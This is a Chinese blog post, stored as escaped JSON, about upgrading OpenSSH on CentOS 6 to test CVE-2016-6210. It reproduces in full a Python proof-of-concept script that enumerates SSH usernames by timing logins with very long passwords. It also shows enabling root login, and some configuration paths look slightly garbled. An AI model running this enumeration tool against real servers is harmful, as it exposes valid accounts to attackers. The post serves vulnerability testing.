=Start=<\/p>\n
\u524d\u6bb5\u65f6\u95f4\u51fa\u4e86\u4e00\u4e2aOpenSSHD\u7684\u7528\u6237\u679a\u4e3e\u6f0f\u6d1e\uff0c\u5b9e\u9645\u6d4b\u8bd5\u4e86\u4e00\u4e0b\uff0c\u6709\u4e00\u5b9a\u6548\u679c\uff0c\u4f46\u662f\u4e0d\u7a33\u5b9a\uff0c\u800c\u4e14\u9700\u8981\u81ea\u5df1\u63d0\u4f9b\u300c\u7528\u6237\u540d\u5b57\u5178\u300d\uff0c\u5b9e\u7528\u4ef7\u503c\u6709\u5f85\u8003\u8bc1\u3002<\/p>\n
\u56e0\u4e3a\u6f0f\u6d1e\u6d4b\u8bd5\u662f\u5728\u5f53\u524d\u6700\u65b0\u7248\u672copensshd-7.2p2\u4e0a\u8fdb\u884c\u7684\u6d4b\u8bd5\uff08\u6839\u636e\u539f\u7406\u6765\u770b\u65e9\u671fopensshd\u5e94\u8be5\u4e5f\u4f1a\u53d7\u5230\u5f71\u54cd\uff09\uff0c\u4f46CentOS 6.x\u9ed8\u8ba4\u7684OpenSSHD\u7248\u672c\u4e00\u822c\u57285.x\uff0c\u6240\u4ee5\u9700\u8981\u5347\u7ea7\u670d\u52a1\u5668\u7684OpenSSHD\u7248\u672c\u8fdb\u884c\u6d4b\u8bd5\uff0c\u672c\u6765\u5e94\u8be5\u662f\u5f88\u7b80\u5355\u7684\u4e00\u4e2a\u8fc7\u7a0b\u7684\uff0c\u4f46\u662f\u4e2d\u95f4\u56e0\u4e3a\u7c97\u5fc3\u5927\u610f\u8fd8\u662f\u8e29\u4e86\u4e00\u4e9b\u5751\uff0c\u5728\u6b64\u8bb0\u5f55\u4e00\u4e0b\uff0c\u65b9\u4fbf\u4ee5\u540e\u67e5\u9605\u3002<\/p>\n
[root@opensshd ~]# wget http:\/\/openbsd.hk\/pub\/OpenBSD\/OpenSSH\/portable\/openssh-7.2p2.tar.gz #\u4e0b\u8f7d\u6e90\u7801\n[root@opensshd ~]# tar zxf openssh-7.2p2.tar.gz\n[root@opensshd ~]# cd openssh-7.2p2\/\n[root@opensshd openssh-7.2p2]# .\/configure && make && make install #\u76f4\u63a5\u300c.\/configure\u300d\u7684\u8bdd\uff0c\u9ed8\u8ba4\u662f\u5b89\u88c5\u5230\u4e86 '\/usr\/local' \u76ee\u5f55\u4e0b\n[root@opensshd openssh-7.2p2]# .\/configure --prefix=\/usr && make && make install #\u624b\u52a8\u6307\u5b9a\u300c--prefix\u300d\u5c06\u8986\u76d6\u7cfb\u7edf\u6b63\u5728\u4f7f\u7528\u7684sshd<\/pre>\n\u57511<\/strong><\/span>\uff1a<\/p>\n
# vim \/usr\/etc\/sshd\n HostKey \/usr\/local\/etc\/ssh_host_rsa_key\n HostKey \/usr\/local\/etc\/ssh_host_dsa_key_config\n# service sshd restart<\/pre>\n\u57512<\/strong><\/span>\uff1a<\/p>\n
# vim \/usr\/etc\/sshd\n PermitRootLogin yes\n# service sshd restart<\/pre>\n\u907f\u514d\u5165\u5751\u7684\u529e\u6cd5\uff1a<\/strong><\/span><\/p>\n
\u5148\u5907\u4efd\u7a0b\u5e8f&\u914d\u7f6e\u6587\u4ef6
\n\u5148\u591a\u5f00\u51e0\u4e2a\u7ec8\u7aef\u9632\u6b62\u8bef\u64cd\u4f5c\u540e\u65e0\u6cd5\u767b\u5f55
\n\u53c2\u8003\u4ee5\u5f80\u7684\u914d\u7f6e\u66f4\u65b0 sshd_config \u914d\u7f6e\u6587\u4ef6<\/p>\n\u6d4b\u8bd5\u00a0CVE-2016-6210 \u6f0f\u6d1e\u7684\u793a\u4f8b\u4ee3\u7801\uff1a<\/h6>\n
#!\/usr\/bin\/python\n#\n# CVEs: CVE-2016-6210 (Credits for this go to Eddie Harari)\n#\n# Author: 0_o -- null_null\n# nu11.nu11 [at] yahoo.com\n# Oh, and it is n-u-one-one.n-u-one-one, no l's...\n# Wonder how the guys at packet storm could get this wrong :(\n#\n# Date: 2016-07-19\n#\n# Purpose: User name enumeration against SSH daemons affected by CVE-2016-6210.\n#\n# Prerequisites: Network access to the SSH daemon.\n#\n# DISCLAIMER: Use against your own hosts only! Attacking stuff you are not\n# permitted to may put you in big trouble!\n#\n# And now - the fun part :-)\n# https:\/\/www.exploit-db.com\/exploits\/40136\/\n\nimport paramiko\nimport time\nimport numpy\nimport argparse\nimport sys\n\nargs = None\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\ndef get_args():\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group()\n parser.add_argument(\"host\", type = str, help = \"Give SSH server address like ip:port or just by ip\")\n group.add_argument(\"-u\", \"--user\", type = str, help = \"Give a single user name\")\n group.add_argument(\"-U\", \"--userlist\", type = str, help = \"Give a file containing a list of users\")\n parser.add_argument(\"-e\", \"--enumerated\", action = \"store_true\", help = \"Only show enumerated users\")\n parser.add_argument(\"-s\", \"--silent\", action = \"store_true\", help = \"Like -e, but just the user names will be written to stdout (no banner, no anything)\")\n parser.add_argument(\"--bytes\", default = 50000, type = int, help = \"Send so many BYTES to the SSH daemon as a password\")\n parser.add_argument(\"--samples\", default = 12, type = int, help = \"Collect so many SAMPLES to calculate a timing baseline for authenticating non-existing users\")\n parser.add_argument(\"--factor\", default = 3.0, type = float, help = \"Used to compute the upper timing boundary for user enumeration\")\n parser.add_argument(\"--trials\", default = 1, type = int, help = \"try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary\")\n args = parser.parse_args()\n return args\n\ndef get_banner(host, port):\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n try:\n ssh.connect(hostname = host, port = port, username = 'invalidinvalidinvalid', password = 'invalidinvalidinvalid')\n except:\n banner = ssh.get_transport().remote_version\n ssh.close()\n return banner\n\ndef connect(host, port, user):\n global args\n starttime = 0.0\n endtime = 0.0\n p = 'B' * int(args.bytes)\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n starttime=time.clock()\n try:\n ssh.connect(hostname = host, port = port, username = user, password = p, look_for_keys = False, gss_auth = False, gss_kex = False, gss_deleg_creds = False, gss_host = None, allow_agent = False)\n except:\n endtime=time.clock()\n finally:\n ssh.close()\n return endtime - starttime\n\ndef main():\n global args\n args = get_args()\n if not args.silent: print(\"\\n\\nUser name enumeration against SSH daemons affected by CVE-2016-6210\")\n if not args.silent: print(\"Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari\\n\\n\")\n if args.host:\n host = args.host.split(\":\")[0]\n try:\n port = int(args.host.split(\":\")[1])\n except IndexError:\n port = 22\n users = []\n if args.user:\n users.append(args.user)\n elif args.userlist:\n with open(args.userlist, \"r\") as f:\n users = f.readlines()\n else:\n if not args.silent: print(bcolors.FAIL + \"[!] \" + bcolors.ENDC + \"You must give a user or a list of users\")\n sys.exit()\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Testing SSHD at: \" + bcolors.BOLD + str(host) + \":\" + str(port) + bcolors.ENDC + \", Banner: \" + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC)\n # get baseline timing for non-existing users...\n baseline_samples = []\n baseline_mean = 0.0\n baseline_deviation = 0.0\n if not args.silent: sys.stdout.write(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Getting baseline timing for authenticating non-existing users\")\n for i in range(1, int(args.samples) + 1):\n if not args.silent: sys.stdout.write('.')\n if not args.silent: sys.stdout.flush()\n sample = connect(host, port, 'foobar-bleh-nonsense' + str(i))\n baseline_samples.append(sample)\n if not args.silent: sys.stdout.write('\\n')\n # remove the biggest and smallest value\n baseline_samples.sort()\n baseline_samples.pop()\n baseline_samples.reverse()\n baseline_samples.pop()\n # do math\n baseline_mean = numpy.mean(numpy.array(baseline_samples))\n baseline_deviation = numpy.std(numpy.array(baseline_samples))\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Baseline mean for host \" + host + \" is \" + str(baseline_mean) + \" seconds.\")\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Baseline variation for host \" + host + \" is \" + str(baseline_deviation) + \" seconds.\")\n upper = baseline_mean + float(args.factor) * baseline_deviation\n if not args.silent: print(bcolors.WARNING + \"[*] \" + bcolors.ENDC + \"Defining timing of x < \" + str(upper) + \" as non-existing user.\")\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Testing your users...\")\n #\n # Get timing for the given user name...\n #\n for u in users:\n user = u.strip()\n enum_samples = []\n enum_mean = 0.0\n for t in range(0, int(args.trials)):\n timeval = connect(host, port, user)\n enum_samples.append(timeval)\n enum_mean = numpy.mean(numpy.array(enum_samples))\n if (enum_mean < upper):\n if not (args.enumerated or args.silent) :\n print(bcolors.FAIL + \"[-] \" + bcolors.ENDC + user + \" - timing: \" + str(enum_mean))\n else:\n if not args.silent:\n print(bcolors.OKGREEN + \"[+] \" + bcolors.ENDC + user + \" - timing: \" + str(enum_mean))\n else:\n print(user)\n\nif __name__ == \"__main__\":\n main()<\/pre>\n\u53c2\u8003\u94fe\u63a5\uff1a<\/h6>\n
\n
- CentOS 6.4\u4e0bOpenSSH\u5347\u7ea7\u52306.7\u64cd\u4f5c\u8fc7\u7a0b\u8be6\u89e3<\/a><\/li>\n
- http:\/\/seclists.org\/fulldisclosure\/2016\/Jul\/51<\/a><\/li>\n
- http:\/\/bobao.360.cn\/learning\/detail\/2904.html<\/a><\/li>\n
- https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2016-6210<\/a> #** RESERVED **<\/li>\n
- https:\/\/web.nvd.nist.gov\/view\/vuln\/detail?vulnId=CVE-2016-6210<\/a> #CVE ID Not Found<\/li>\n
- https:\/\/www.exploit-db.com\/exploits\/40136\/<\/a><\/li>\n<\/ul>\n
=END=<\/p>\n","protected":false},"excerpt":{"rendered":"
=Start= \u7f18\u7531\uff1a \u524d\u6bb5\u65f6\u95f4\u51fa\u4e86\u4e00\u4e2aOpenSSHD\u7684\u7528\u6237\u679a\u4e3e\u6f0f\u6d1e\uff0c\u5b9e\u9645\u6d4b\u8bd5\u4e86\u4e00\u4e0b\uff0c\u6709\u4e00\u5b9a\u6548\u679c\uff0c\u4f46\u662f\u4e0d\u7a33\u5b9a […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,25],"tags":[454,30,644],"class_list":["post-2814","post","type-post","status-publish","format-standard","hentry","category-linux","category-security","tag-cve","tag-linux","tag-openssh"],"views":6989,"_links":{"self":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/2814","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/comments?post=2814"}],"version-history":[{"count":0,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/2814\/revisions"}],"wp:attachment":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/media?parent=2814"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/categories?post=2814"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/tags?post=2814"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}